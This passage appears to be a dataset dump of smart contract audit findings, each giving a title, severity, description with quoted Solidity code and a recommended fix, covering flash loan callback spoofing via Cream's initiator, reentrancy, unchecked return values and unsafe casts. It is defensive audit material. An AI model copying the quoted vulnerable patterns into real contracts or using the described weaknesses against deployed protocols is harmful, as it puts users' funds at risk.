getUserGaugeWeight[user][gauge] = oldWeight - weight;\\n if (oldWeight == weight) {\\n // If removing all weight, remove gauge from user list.\\n assert(\\_userGauges[user].remove(gauge));\\n }\\n```\\n -Undelegating 0 votes from an address who is not a delegate of a user will fail an assert.чlowчSimilar scenario with issue 5.5. 
`ERC20MultiVotes._undelegate` has an edge case scenario where a user can attempt to undelegate from a `delegatee` that is not in the user delegates list by 0 `amount`, which would trigger a failure in an assert.\\n```\\nfunction \\_undelegate(\\n address delegator,\\n address delegatee,\\n uint256 amount\\n) internal virtual {\\n uint256 newDelegates = \\_delegatesVotesCount[delegator][delegatee] - amount;\\n\\n if (newDelegates == 0) {\\n assert(\\_delegates[delegator].remove(delegatee)); // Should never fail.\\n }\\n```\\n\\nAs `_undelegate`, or `undelegate` don't explicitly check that a `delegatee` belongs to the user, the contract logic continues with its operations in `_undelegate` for the `delegatee` passed to it. In general this is fine because if a user tries to `undelegate` non-zero `amount` from a `delegatee` they have no votes delegated to, thus getting `_delegatesVotesCount[delegator][delegatee]=0`, there would be a revert due to a negative value being passed to `uint256 newDelegates`\\n```\\nuint256 newDelegates = \\_delegatesVotesCount[delegator][delegatee] - amount;\\n```\\n\\nHowever, passing a `amount=0` parameter with a `delegatee` that doesn't belong to the user, would successfully process that line. This would then be followed by an evaluation `if (newDelegates == 0)`, which would succeed, to finally reach an assert that will verify a remove of that `delegatee` from the user delegates list. 
However, it will fail since it was never there in the first place.\\n```\\nassert(\\_delegates[delegator].remove(delegatee)); // Should never fail.\\n```\\n\\nAlthough an edge case with no effect on contract state's health, it may happen with front end bugs or incorrect user transactions, and it is best not to have asserts fail, as per the dev comment in that line “// Should never fail”.чReplace `assert()` with a `require()` or verify that the delegatee belongs to the user prior to performing any operations.чч```\\nfunction \\_undelegate(\\n address delegator,\\n address delegatee,\\n uint256 amount\\n) internal virtual {\\n uint256 newDelegates = \\_delegatesVotesCount[delegator][delegatee] - amount;\\n\\n if (newDelegates == 0) {\\n assert(\\_delegates[delegator].remove(delegatee)); // Should never fail.\\n }\\n```\\n -xTRIBE.emitVotingBalances - DelegateVotesChanged event can be emitted by anyoneчmediumч`xTRIBE.emitVotingBalances` is an external function without authentication constraints. It means anyone can call it and emit `DelegateVotesChanged` which may impact other layers of code that rely on these events.\\n```\\nfunction emitVotingBalances(address[] calldata accounts) external {\\n uint256 size = accounts.length;\\n\\n for (uint256 i = 0; i < size; ) {\\n emit DelegateVotesChanged(accounts[i], 0, getVotes(accounts[i]));\\n\\n unchecked {\\n i++;\\n }\\n }\\n}\\n```\\nчConsider restricting access to this function for allowed accounts only.чч```\\nfunction emitVotingBalances(address[] calldata accounts) external {\\n uint256 size = accounts.length;\\n\\n for (uint256 i = 0; i < size; ) {\\n emit DelegateVotesChanged(accounts[i], 0, getVotes(accounts[i]));\\n\\n unchecked {\\n i++;\\n }\\n }\\n}\\n```\\n -Decreasing maxGauges does not account for users' previous gauge list size.чlowч`ERC20Gauges` contract has a `maxGauges` state variable meant to represent the maximum amount of gauges a user can allocate to. 
As per the natspec, it is meant to protect against gas DOS attacks upon token transfer to allow complicated transactions to fit in a block. There is also a function `setMaxGauges` for authorised users to decrease or increase this state variable.\\n```\\nfunction setMaxGauges(uint256 newMax) external requiresAuth {\\n uint256 oldMax = maxGauges;\\n maxGauges = newMax;\\n\\n emit MaxGaugesUpdate(oldMax, newMax);\\n}\\n```\\n\\nHowever, if it is decreased and there are users that have already reached the previous maximum that was larger, there may be unexpected behavior. All of these users' gauges will remain active and manageable, such as have user gauge weights incremented or decremented. So it could be possible that for such a user address `user_address`, numUserGauges(user_address) > `maxGauges`. While in the current contract logic this does not cause issues, `maxGauges` is a public variable that may be used by other systems. If unaccounted for, this discrepancy between the contract's `maxGauges` and the users' actual number of gauges given by `numUserGauges()` could, for example, cause gauges to be skipped or fail loops bounded by `maxGauges` in other systems' logic that try and go through all user gauges.чEither document the potential discrepancy between the user gauges size and the `maxGauges` state variable, or limit `maxGauges` to be only called within the contract thereby forcing other contracts to retrieve user gauge list size through `numUserGauges()`.чч```\\nfunction setMaxGauges(uint256 newMax) external requiresAuth {\\n uint256 oldMax = maxGauges;\\n maxGauges = newMax;\\n\\n emit MaxGaugesUpdate(oldMax, newMax);\\n}\\n```\\n -Accounts that claim incentives immediately before the migration will be stuckчmediumчFor accounts that existed before the migration to the new incentive calculation, the following happens when they claim incentives for the first time after the migration: First, the incentives that are still owed from before the migration are 
computed according to the old formula; the incentives since the migration are calculated according to the new logic, and the two values are added together. The first part - calculating the pre-migration incentives according to the old formula - happens in function MigrateIncentives.migrateAccountFromPreviousCalculation; the following lines are of particular interest in the current context:\\n```\\nuint256 timeSinceMigration = finalMigrationTime - lastClaimTime;\\n\\n// (timeSinceMigration \\* INTERNAL\\_TOKEN\\_PRECISION \\* finalEmissionRatePerYear) / YEAR\\nuint256 incentiveRate =\\n timeSinceMigration\\n .mul(uint256(Constants.INTERNAL\\_TOKEN\\_PRECISION))\\n // Migration emission rate is stored as is, denominated in whole tokens\\n .mul(finalEmissionRatePerYear).mul(uint256(Constants.INTERNAL\\_TOKEN\\_PRECISION))\\n .div(Constants.YEAR);\\n\\n// Returns the average supply using the integral of the total supply.\\nuint256 avgTotalSupply = finalTotalIntegralSupply.sub(lastClaimIntegralSupply).div(timeSinceMigration);\\n```\\n\\nThe division in the last line will throw if `finalMigrationTime` and `lastClaimTime` are equal. This will happen if an account claims incentives immediately before the migration happens - where “immediately” means in the same block. In such a case, the account will be stuck as any attempt to claim incentives will revert.чThe function should return `0` if `finalMigrationTime` and `lastClaimTime` are equal. 
Moreover, the variable name `timeSinceMigration` is misleading, as the variable doesn't store the time since the migration but the time between the last incentive claim and the migration.чч```\\nuint256 timeSinceMigration = finalMigrationTime - lastClaimTime;\\n\\n// (timeSinceMigration \\* INTERNAL\\_TOKEN\\_PRECISION \\* finalEmissionRatePerYear) / YEAR\\nuint256 incentiveRate =\\n timeSinceMigration\\n .mul(uint256(Constants.INTERNAL\\_TOKEN\\_PRECISION))\\n // Migration emission rate is stored as is, denominated in whole tokens\\n .mul(finalEmissionRatePerYear).mul(uint256(Constants.INTERNAL\\_TOKEN\\_PRECISION))\\n .div(Constants.YEAR);\\n\\n// Returns the average supply using the integral of the total supply.\\nuint256 avgTotalSupply = finalTotalIntegralSupply.sub(lastClaimIntegralSupply).div(timeSinceMigration);\\n```\\n -type(T).max is inclusiveчlowчThroughout the codebase, there are checks whether a number can be represented by a certain type.\\n```\\nrequire(accumulatedNOTEPerNToken < type(uint128).max); // dev: accumulated NOTE overflow\\n```\\n\\n```\\nrequire(blockTime < type(uint32).max); // dev: block time overflow\\n```\\n\\n```\\nrequire(totalSupply <= type(uint96).max);\\nrequire(blockTime <= type(uint32).max);\\n```\\n\\nSometimes these checks use `<=`, sometimes they use `<`.ч`type(T).max` is inclusive, i.e., it is the greatest number that can be represented with type `T`. Strictly speaking, it can and should therefore be used consistently with `<=` instead of `<`.чч```\\nrequire(accumulatedNOTEPerNToken < type(uint128).max); // dev: accumulated NOTE overflow\\n```\\n -FlasherFTM - Unsolicited invocation of the callback (CREAM auth bypass)чhighчTL;DR: Anyone can call `ICTokenFlashloan(crToken).flashLoan(address(FlasherFTM), address(FlasherFTM), info.amount, params)` directly and pass validation checks in `onFlashLoan()`. 
This call forces it to accept unsolicited flash loans and execute the actions provided under the attacker's `FlashLoan.Info`.\\n`receiver.onFlashLoan(initiator, token, amount, ...)` is called when receiving a flash loan. According to EIP-3156, the `initiator` is `msg.sender` so that one can use it to check if the call to `receiver.onFlashLoan()` was unsolicited or not.\\nThird-party Flash Loan provider contracts are often upgradeable.\\nFor example, the Geist lending contract configured with this system is upgradeable. Upgradeable contracts bear the risk that one cannot assume that the contract is always running the same code. In the worst case, for example, a malicious proxy admin (leaked keys, insider, …) could upgrade the contract and perform unsolicited calls with arbitrary data to Flash Loan consumers in an attempt to exploit them. It, therefore, is highly recommended to verify that flash loan callbacks in the system can only be called if the contract was calling out to the provider to provide a Flash Loan and that the conditions of the flash loan (returned data, amount) are correct.\\nNot all Flash Loan providers implement EIP-3156 correctly.\\nCream Finance, for example, allows users to set an arbitrary `initiator` when requesting a flash loan. This deviates from EIP-3156 and was reported to the Cream development team as a security issue. Hence, anyone can spoof that `initiator` and potentially bypass authentication checks in the consumers' `receiver.onFlashLoan()`. Depending on the third-party application consuming the flash loan is doing with the funds, the impact might range from medium to critical with funds at risk. 
For example, projects might assume that the flash loan always originates from their trusted components, e.g., because they use them to refinance switching funds between pools or protocols.\\nThe `FlasherFTM` contract assumes that flash loans for the Flasher can only be initiated by authorized callers (isAuthorized) - for a reason - because it is vital that the `FlashLoan.Info calldata info` parameter only contains trusted data:\\n```\\n/\\*\\*\\n \\* @dev Routing Function for Flashloan Provider\\n \\* @param info: struct information for flashLoan\\n \\* @param \\_flashnum: integer identifier of flashloan provider\\n \\*/\\nfunction initiateFlashloan(FlashLoan.Info calldata info, uint8 \\_flashnum) external isAuthorized override {\\n if (\\_flashnum == 0) {\\n \\_initiateGeistFlashLoan(info);\\n } else if (\\_flashnum == 2) {\\n \\_initiateCreamFlashLoan(info);\\n } else {\\n revert(Errors.VL\\_INVALID\\_FLASH\\_NUMBER);\\n }\\n}\\n```\\n\\n```\\nmodifier isAuthorized() {\\n require(\\n msg.sender == \\_fujiAdmin.getController() ||\\n msg.sender == \\_fujiAdmin.getFliquidator() ||\\n msg.sender == owner(),\\n Errors.VL\\_NOT\\_AUTHORIZED\\n );\\n \\_;\\n}\\n```\\n\\nThe Cream Flash Loan initiation code requests the flash loan via ICTokenFlashloan(crToken).flashLoan(receiver=address(this), initiator=address(this), ...):\\n```\\n/\\*\\*\\n \\* @dev Initiates an CreamFinance flashloan.\\n \\* @param info: data to be passed between functions executing flashloan logic\\n \\*/\\nfunction \\_initiateCreamFlashLoan(FlashLoan.Info calldata info) internal {\\n address crToken = info.asset == \\_FTM\\n ? 
0xd528697008aC67A21818751A5e3c58C8daE54696\\n : \\_crMappings.addressMapping(info.asset);\\n\\n // Prepara data for flashloan execution\\n bytes memory params = abi.encode(info);\\n\\n // Initialize Instance of Cream crLendingContract\\n ICTokenFlashloan(crToken).flashLoan(address(this), address(this), info.amount, params);\\n}\\n```\\n\\nNote: The Cream implementation does not send `sender=msg.sender` to the `onFlashLoan()` callback - like any other flash loan provider does and EIP-3156 suggests - but uses the value that was passed in as `initiator` when requesting the callback. This detail completely undermines the authentication checks implemented in `onFlashLoan` as the `sender` value cannot be trusted.\\n```\\naddress initiator,\\n```\\n\\n```\\n \\*/\\nfunction onFlashLoan(\\n address sender,\\n address underlying,\\n uint256 amount,\\n uint256 fee,\\n bytes calldata params\\n) external override returns (bytes32) {\\n // Check Msg. Sender is crToken Lending Contract\\n // from IronBank because ETH on Cream cannot perform a flashloan\\n address crToken = underlying == \\_WFTM\\n ? 0xd528697008aC67A21818751A5e3c58C8daE54696\\n : \\_crMappings.addressMapping(underlying);\\n require(msg.sender == crToken && address(this) == sender, Errors.VL\\_NOT\\_AUTHORIZED);\\n```\\nчCream Finance\\nWe've reached out to the Cream developer team, who have confirmed the issue. They are planning to implement countermeasures. Our recommendation can be summarized as follows:\\nImplement the EIP-3156 compliant version of flashLoan() with initiator hardcoded to `msg.sender`.\\nFujiDAO (and other flash loan consumers)\\nWe recommend not assuming that `FlashLoan.Info` contains trusted or even validated data when a third-party flash loan provider provides it! Developers should ensure that the data received was provided when the flash loan was requested.\\nThe contract should reject unsolicited flash loans. 
In the scenario where a flash loan provider is exploited, the risk of an exploited trust relationship is less likely to spread to the rest of the system.\\nThe Cream `initiator` provided to the `onFlashLoan()` callback cannot be trusted until the Cream developers fix this issue. The `initiator` can easily be spoofed to perform unsolicited flash loans. We, therefore, suggest:\\nValidate that the `initiator` value is the `flashLoan()` caller. This conforms to the standard and is hopefully how the Cream team is fixing this, and\\nEnsure the implementation tracks its own calls to `flashLoan()` in a state-variable semaphore, i.e. store the flash loan data/hash in a temporary state-variable that is only set just before calling `flashLoan()` until being called back in `onFlashLoan()`. The received data can then be verified against the stored artifact. This is a safe way of authenticating and verifying callbacks.\\nValues received from untrusted third parties should always be validated with the utmost scrutiny.\\nSmart contract upgrades are risky, so we recommend implementing the means to pause certain flash loan providers.\\nEnsure that flash loan handler functions should never re-enter the system. This provides additional security guarantees in case a flash loan provider gets breached.\\nNote: The Fuji development team implemented a hotfix to prevent unsolicited calls from Cream by storing the `hash(FlashLoan.info)` in a state variable just before requesting the flash loan. Inside the `onFlashLoan` callback, this state is validated and cleared accordingly.\\nAn improvement to this hotfix would be, to check `_paramsHash` before any external calls are made and clear it right after validation at the beginning of the function. Additionally, `hash==0x0` should be explicitly disallowed. 
By doing so, the check also serves as a reentrancy guard and helps further reduce the risk of a potentially malicious flash loan re-entering the function.чч```\\n/\\*\\*\\n \\* @dev Routing Function for Flashloan Provider\\n \\* @param info: struct information for flashLoan\\n \\* @param \\_flashnum: integer identifier of flashloan provider\\n \\*/\\nfunction initiateFlashloan(FlashLoan.Info calldata info, uint8 \\_flashnum) external isAuthorized override {\\n if (\\_flashnum == 0) {\\n \\_initiateGeistFlashLoan(info);\\n } else if (\\_flashnum == 2) {\\n \\_initiateCreamFlashLoan(info);\\n } else {\\n revert(Errors.VL\\_INVALID\\_FLASH\\_NUMBER);\\n }\\n}\\n```\\n -Lack of reentrancy protection in token interactionsчhighчToken operations may potentially re-enter the system. For example, `univTransfer` may perform a low-level `to.call{value}()` and, depending on the token's specification (e.g. `ERC-20` extension or `ERC-20` compliant ERC-777), `token` may implement callbacks when being called as `token.safeTransfer(to, amount)` (or token.transfer*()).\\nTherefore, it is crucial to strictly adhere to the checks-effects pattern and safeguard affected methods using a mutex.\\n```\\nfunction univTransfer(\\n IERC20 token,\\n address payable to,\\n uint256 amount\\n) internal {\\n if (amount > 0) {\\n if (isFTM(token)) {\\n (bool sent, ) = to.call{ value: amount }(\"\");\\n require(sent, \"Failed to send Ether\");\\n } else {\\n token.safeTransfer(to, amount);\\n }\\n }\\n}\\n```\\n\\n`withdraw` is `nonReentrant` while `paybackAndWithdraw` is not, which appears to be inconsistent\\n```\\n/\\*\\*\\n \\* @dev Paybacks the underlying asset and withdraws collateral in a single function call from activeProvider\\n \\* @param \\_paybackAmount: amount of underlying asset to be payback, pass -1 to pay full amount\\n \\* @param \\_collateralAmount: amount of collateral to be withdrawn, pass -1 to withdraw maximum amount\\n \\*/\\nfunction paybackAndWithdraw(int256 
\\_paybackAmount, int256 \\_collateralAmount) external payable {\\n updateF1155Balances();\\n \\_internalPayback(\\_paybackAmount);\\n \\_internalWithdraw(\\_collateralAmount);\\n}\\n```\\n\\n```\\n/\\*\\*\\n \\* @dev Paybacks Vault's type underlying to activeProvider - called by users\\n \\* @param \\_repayAmount: token amount of underlying to repay, or\\n \\* pass any 'negative number' to repay full ammount\\n \\* Emits a {Repay} event.\\n \\*/\\nfunction payback(int256 \\_repayAmount) public payable override {\\n updateF1155Balances();\\n \\_internalPayback(\\_repayAmount);\\n}\\n```\\n\\n`depositAndBorrow` is not `nonReentrant` while `borrow()` is which appears to be inconsistent\\n```\\n/\\*\\*\\n \\* @dev Deposits collateral and borrows underlying in a single function call from activeProvider\\n \\* @param \\_collateralAmount: amount to be deposited\\n \\* @param \\_borrowAmount: amount to be borrowed\\n \\*/\\nfunction depositAndBorrow(uint256 \\_collateralAmount, uint256 \\_borrowAmount) external payable {\\n updateF1155Balances();\\n \\_internalDeposit(\\_collateralAmount);\\n \\_internalBorrow(\\_borrowAmount);\\n}\\n```\\n\\n```\\n/\\*\\*\\n \\* @dev Borrows Vault's type underlying amount from activeProvider\\n \\* @param \\_borrowAmount: token amount of underlying to borrow\\n \\* Emits a {Borrow} event.\\n \\*/\\nfunction borrow(uint256 \\_borrowAmount) public override nonReentrant {\\n updateF1155Balances();\\n \\_internalBorrow(\\_borrowAmount);\\n}\\n```\\n\\nHere's an example call stack for `depositAndBorrow` that outlines how a reentrant `ERC20` token (e.g. ERC777) may call back into `depositAndBorrow` again, `updateBalances` twice in the beginning before tokens are even transferred and then continues to call `internalDeposit`, `internalBorrow`, `internalBorrow` without an update before the 2nd borrow. 
Note that both `internalDeposit` and `internalBorrow` read indexes that may now be outdated.\\n```\\ndepositAndBorrow\\n updateBalances\\n internalDeposit ->\\n ERC777(collateralAsset).safeTransferFrom() ---> calls back!\\n ---callback:beforeTokenTransfer---->\\n !! depositAndBorrow\\n updateBalances\\n internalDeposit\\n --> ERC777.safeTransferFrom()\\n <--\\n \\_deposit\\n mint\\n internalBorrow\\n mint\\n \\_borrow\\n ERC777(borrowAsset).univTransfer(msg.sender) --> might call back\\n\\n <-------------------------------\\n \\_deposit\\n mint\\n internalBorrow\\n mint\\n \\_borrow \\n --> ERC777(borrowAsset).univTransfer(msg.sender) --> might call back\\n <--\\n```\\nчConsider decorating methods that may call back to untrusted sources (i.e., native token transfers, callback token operations) as `nonReentrant` and strictly follow the checks-effects pattern for all contracts in the code-base.чч```\\nfunction univTransfer(\\n IERC20 token,\\n address payable to,\\n uint256 amount\\n) internal {\\n if (amount > 0) {\\n if (isFTM(token)) {\\n (bool sent, ) = to.call{ value: amount }(\"\");\\n require(sent, \"Failed to send Ether\");\\n } else {\\n token.safeTransfer(to, amount);\\n }\\n }\\n}\\n```\\n -Unchecked Return Values - ICErc20 repayBorrowчhighч`ICErc20.repayBorrow` returns a non-zero uint on error. Multiple providers do not check for this error condition and might return `success` even though `repayBorrow` failed, returning an error code.\\nThis can potentially allow a malicious user to call `paybackAndWithdraw()` while not repaying by causing an error in the sub-call to `Compound.repayBorrow()`, which ends up being silently ignored. 
Due to the missing success condition check, execution continues normally with `_internalWithdraw()`.\\nAlso, see issue 4.5.\\n```\\nfunction repayBorrow(uint256 repayAmount) external returns (uint256);\\n```\\n\\nThe method may return an error due to multiple reasons:\\n```\\nfunction repayBorrowInternal(uint repayAmount) internal nonReentrant returns (uint, uint) {\\n uint error = accrueInterest();\\n if (error != uint(Error.NO\\_ERROR)) {\\n // accrueInterest emits logs on errors, but we still want to log the fact that an attempted borrow failed\\n return (fail(Error(error), FailureInfo.REPAY\\_BORROW\\_ACCRUE\\_INTEREST\\_FAILED), 0);\\n }\\n // repayBorrowFresh emits repay-borrow-specific logs on errors, so we don't need to\\n return repayBorrowFresh(msg.sender, msg.sender, repayAmount);\\n}\\n```\\n\\n```\\nif (allowed != 0) {\\n return (failOpaque(Error.COMPTROLLER\\_REJECTION, FailureInfo.REPAY\\_BORROW\\_COMPTROLLER\\_REJECTION, allowed), 0);\\n}\\n\\n/\\* Verify market's block number equals current block number \\*/\\nif (accrualBlockNumber != getBlockNumber()) {\\n return (fail(Error.MARKET\\_NOT\\_FRESH, FailureInfo.REPAY\\_BORROW\\_FRESHNESS\\_CHECK), 0);\\n}\\n\\nRepayBorrowLocalVars memory vars;\\n\\n/\\* We remember the original borrowerIndex for verification purposes \\*/\\nvars.borrowerIndex = accountBorrows[borrower].interestIndex;\\n\\n/\\* We fetch the amount the borrower owes, with accumulated interest \\*/\\n(vars.mathErr, vars.accountBorrows) = borrowBalanceStoredInternal(borrower);\\nif (vars.mathErr != MathError.NO\\_ERROR) {\\n return (failOpaque(Error.MATH\\_ERROR, FailureInfo.REPAY\\_BORROW\\_ACCUMULATED\\_BALANCE\\_CALCULATION\\_FAILED, uint(vars.mathErr)), 0);\\n}\\n```\\n\\nMultiple providers, here are some examples:\\n```\\n // Check there is enough balance to pay\\n require(erc20token.balanceOf(address(this)) >= \\_amount, \"Not-enough-token\");\\n erc20token.univApprove(address(cyTokenAddr), \\_amount);\\n 
cyToken.repayBorrow(\\_amount);\\n}\\n```\\n\\n```\\nrequire(erc20token.balanceOf(address(this)) >= \\_amount, \"Not-enough-token\");\\nerc20token.univApprove(address(cyTokenAddr), \\_amount);\\ncyToken.repayBorrow(\\_amount);\\n```\\n\\n```\\nif (\\_isETH(\\_asset)) {\\n // Create a reference to the corresponding cToken contract\\n ICEth cToken = ICEth(cTokenAddr);\\n\\n cToken.repayBorrow{ value: msg.value }();\\n} else {\\n // Create reference to the ERC20 contract\\n IERC20 erc20token = IERC20(\\_asset);\\n\\n // Create a reference to the corresponding cToken contract\\n ICErc20 cToken = ICErc20(cTokenAddr);\\n\\n // Check there is enough balance to pay\\n require(erc20token.balanceOf(address(this)) >= \\_amount, \"Not-enough-token\");\\n erc20token.univApprove(address(cTokenAddr), \\_amount);\\n cToken.repayBorrow(\\_amount);\\n}\\n```\\nчCheck for `cyToken.repayBorrow(_amount) != 0` or `Error.NO_ERROR`.чч```\\nfunction repayBorrow(uint256 repayAmount) external returns (uint256);\\n```\\n -Unchecked Return Values - IComptroller exitMarket, enterMarketчhighч`IComptroller.exitMarket()`, `IComptroller.enterMarkets()` may return a non-zero uint on error but none of the Providers check for this error condition. 
Together with issue 4.10, this might suggest that unchecked return values may be a systemic problem.\\nHere's the upstream implementation:\\n```\\nif (amountOwed != 0) {\\n return fail(Error.NONZERO\\_BORROW\\_BALANCE, FailureInfo.EXIT\\_MARKET\\_BALANCE\\_OWED);\\n}\\n\\n/\\* Fail if the sender is not permitted to redeem all of their tokens \\*/\\nuint allowed = redeemAllowedInternal(cTokenAddress, msg.sender, tokensHeld);\\nif (allowed != 0) {\\n return failOpaque(Error.REJECTION, FailureInfo.EXIT\\_MARKET\\_REJECTION, allowed);\\n}\\n```\\n\\n```\\n /\\*\\*\\n \\* @notice Removes asset from sender's account liquidity calculation\\n \\* @dev Sender must not have an outstanding borrow balance in the asset,\\n \\* or be providing necessary collateral for an outstanding borrow.\\n \\* @param cTokenAddress The address of the asset to be removed\\n \\* @return Whether or not the account successfully exited the market\\n \\*/\\n function exitMarket(address cTokenAddress) external returns (uint) {\\n CToken cToken = CToken(cTokenAddress);\\n /\\* Get sender tokensHeld and amountOwed underlying from the cToken \\*/\\n (uint oErr, uint tokensHeld, uint amountOwed, ) = cToken.getAccountSnapshot(msg.sender);\\n require(oErr == 0, \"exitMarket: getAccountSnapshot failed\"); // semi-opaque error code\\n\\n /\\* Fail if the sender has a borrow balance \\*/\\n if (amountOwed != 0) {\\n return fail(Error.NONZERO\\_BORROW\\_BALANCE, FailureInfo.EXIT\\_MARKET\\_BALANCE\\_OWED);\\n }\\n\\n /\\* Fail if the sender is not permitted to redeem all of their tokens \\*/\\n uint allowed = redeemAllowedInternal(cTokenAddress, msg.sender, tokensHeld);\\n if (allowed != 0) {\\n return failOpaque(Error.REJECTION, FailureInfo.EXIT\\_MARKET\\_REJECTION, allowed);\\n }\\n```\\n\\nUnchecked return value `exitMarket`\\nAll Providers exhibit the same issue, probably due to code reuse. (also see https://github.com/ConsenSysDiligence/fuji-protocol-audit-2022-02/issues/19). 
Some examples:\\n```\\nfunction \\_exitCollatMarket(address \\_cyTokenAddress) internal {\\n // Create a reference to the corresponding network Comptroller\\n IComptroller comptroller = IComptroller(\\_getComptrollerAddress());\\n\\n comptroller.exitMarket(\\_cyTokenAddress);\\n}\\n```\\n\\n```\\nfunction \\_exitCollatMarket(address \\_cyTokenAddress) internal {\\n // Create a reference to the corresponding network Comptroller\\n IComptroller comptroller = IComptroller(\\_getComptrollerAddress());\\n\\n comptroller.exitMarket(\\_cyTokenAddress);\\n}\\n```\\n\\n```\\nfunction \\_exitCollatMarket(address \\_cTokenAddress) internal {\\n // Create a reference to the corresponding network Comptroller\\n IComptroller comptroller = IComptroller(\\_getComptrollerAddress());\\n\\n comptroller.exitMarket(\\_cTokenAddress);\\n}\\n```\\n\\n```\\nfunction \\_exitCollatMarket(address \\_cyTokenAddress) internal {\\n // Create a reference to the corresponding network Comptroller\\n IComptroller comptroller = IComptroller(\\_getComptrollerAddress());\\n\\n comptroller.exitMarket(\\_cyTokenAddress);\\n}\\n```\\n\\nUnchecked return value `enterMarkets` (Note that `IComptroller` returns `NO_ERROR` when already joined to `enterMarkets`.\\nAll Providers exhibit the same issue, probably due to code reuse. (also see https://github.com/ConsenSysDiligence/fuji-protocol-audit-2022-02/issues/19). 
For example:\\n```\\nfunction \\_enterCollatMarket(address \\_cyTokenAddress) internal {\\n // Create a reference to the corresponding network Comptroller\\n IComptroller comptroller = IComptroller(\\_getComptrollerAddress());\\n\\n address[] memory cyTokenMarkets = new address[](1);\\n cyTokenMarkets[0] = \\_cyTokenAddress;\\n comptroller.enterMarkets(cyTokenMarkets);\\n}\\n```\\nчRequire that return value is `ERROR.NO_ERROR` or `0`.чч```\\nif (amountOwed != 0) {\\n return fail(Error.NONZERO\\_BORROW\\_BALANCE, FailureInfo.EXIT\\_MARKET\\_BALANCE\\_OWED);\\n}\\n\\n/\\* Fail if the sender is not permitted to redeem all of their tokens \\*/\\nuint allowed = redeemAllowedInternal(cTokenAddress, msg.sender, tokensHeld);\\nif (allowed != 0) {\\n return failOpaque(Error.REJECTION, FailureInfo.EXIT\\_MARKET\\_REJECTION, allowed);\\n}\\n```\\n -Fliquidator - excess funds of native tokens are not returnedчmediumч`FliquidatorFTM.batchLiquidate` accepts the `FTM` native token and checks if at least an amount of `debtTotal` was provided with the call. The function continues using the `debtTotal` value. If a caller provides msg.value > `debtTotal`, excess funds are not returned and remain in the contract. `FliquidatorFTM` is not upgradeable, and there is no way to recover the surplus funds.\\n```\\nif (vAssets.borrowAsset == FTM) {\\n require(msg.value >= debtTotal, Errors.VL\\_AMOUNT\\_ERROR);\\n} else {\\n```\\nчConsider returning excess funds. Consider making `_constructParams` public to allow the caller to pre-calculate the `debtTotal` that needs to be provided with the call.\\nConsider removing support for native token `FTM` entirely to reduce the overall code complexity. 
The wrapped equivalent can be used instead.чч```\\nif (vAssets.borrowAsset == FTM) {\\n require(msg.value >= debtTotal, Errors.VL\\_AMOUNT\\_ERROR);\\n} else {\\n```\\n -Unsafe arithmetic castsчmediumчThe reason for using signed integers in some situations appears to be to use negative values as an indicator to withdraw everything. Using a whole bit of uint256 for this is quite a lot when using `type(uint256).max` would equal or better serve as a flag to withdraw everything.\\nFurthermore, even though the code uses `solidity 0.8.x`, which safeguards arithmetic operations against under/overflows, arithmetic typecast is not protected.\\nAlso, see issue 4.9 for a related issue.\\n```\\n⇒ solidity-shell\\n\\n🚀 Entering interactive Solidity ^0.8.11 shell. '.help' and '.exit' are your friends.\\n » ℹ️ ganache-mgr: starting temp. ganache instance // rest of code\\n » uint(int(-100))\\n115792089237316195423570985008687907853269984665640564039457584007913129639836\\n » int256(uint(2\\*\\*256-100))\\n-100\\n```\\n\\n```\\n// Compute how much collateral needs to be swapt\\nuint256 collateralInPlay = \\_getCollateralInPlay(\\n vAssets.collateralAsset,\\n vAssets.borrowAsset,\\n debtTotal + bonus\\n);\\n\\n// Burn f1155\\n\\_burnMulti(addrs, borrowBals, vAssets, \\_vault, f1155);\\n\\n// Withdraw collateral\\nIVault(\\_vault).withdrawLiq(int256(collateralInPlay));\\n```\\n\\n```\\n// Compute how much collateral needs to be swapt for all liquidated users\\nuint256 collateralInPlay = \\_getCollateralInPlay(\\n vAssets.collateralAsset,\\n vAssets.borrowAsset,\\n \\_amount + \\_flashloanFee + bonus\\n);\\n\\n// Burn f1155\\n\\_burnMulti(\\_addrs, \\_borrowBals, vAssets, \\_vault, f1155);\\n\\n// Withdraw collateral\\nIVault(\\_vault).withdrawLiq(int256(collateralInPlay));\\n```\\n\\n```\\nuint256 amount = \\_amount < 0 ? 
debtTotal : uint256(\\_amount);\\n```\\n\\n```\\nfunction withdrawLiq(int256 \\_withdrawAmount) external override nonReentrant onlyFliquidator {\\n // Logic used when called by Fliquidator\\n \\_withdraw(uint256(\\_withdrawAmount), address(activeProvider));\\n IERC20Upgradeable(vAssets.collateralAsset).univTransfer(\\n payable(msg.sender),\\n uint256(\\_withdrawAmount)\\n );\\n}\\n```\\n\\npot. unsafe truncation (unlikely)\\n```\\nfunction updateState(uint256 \\_assetID, uint256 newBalance) external override onlyPermit {\\n uint256 total = totalSupply(\\_assetID);\\n if (newBalance > 0 && total > 0 && newBalance > total) {\\n uint256 newIndex = (indexes[\\_assetID] \\* newBalance) / total;\\n indexes[\\_assetID] = uint128(newIndex);\\n }\\n}\\n```\\nчIf negative values are only used as a flag to indicate that all funds should be used for an operation, use `type(uint256).max` instead. It is wasting less value-space for a simple flag than using the uint256 high-bit range. Avoid typecast where possible. Use `SafeCast` instead or verify that the casts are safe because the values they operate on cannot under- or overflow. Add inline code comments if that's the case.чч```\\n⇒ solidity-shell\\n\\n🚀 Entering interactive Solidity ^0.8.11 shell. '.help' and '.exit' are your friends.\\n » ℹ️ ganache-mgr: starting temp. ganache instance // rest of code\\n » uint(int(-100))\\n115792089237316195423570985008687907853269984665640564039457584007913129639836\\n » int256(uint(2\\*\\*256-100))\\n-100\\n```\\n -Missing input validation on flash close fee factorsчmediumчThe `FliquidatorFTM` contract allows authorized parties to set the flash close fee factor. The factor is provided as two integers denoting numerator and denominator. Due to a lack of boundary checks, it is possible to set unrealistically high factors, which go well above 1. 
